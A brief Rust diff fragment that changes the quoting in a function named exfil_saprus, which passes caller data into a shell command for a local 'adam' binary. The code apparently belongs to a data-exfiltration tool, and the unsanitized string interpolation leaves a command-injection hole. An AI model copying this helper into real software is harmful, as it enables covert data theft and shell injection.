@@ -22,7 +22,7 @@ fn cd(path: &str) -> Result<(), std::io::Error> {
}
fn exfil_saprus(data: &str) {
match execute_command(format!("/usr/local/sbin/adam -r \"{}\"", data).as_str()) {
match execute_command(format!("/usr/local/sbin/adam -r '{}'", data).as_str()) {
_ => (),
The note is not visible to the blocked user.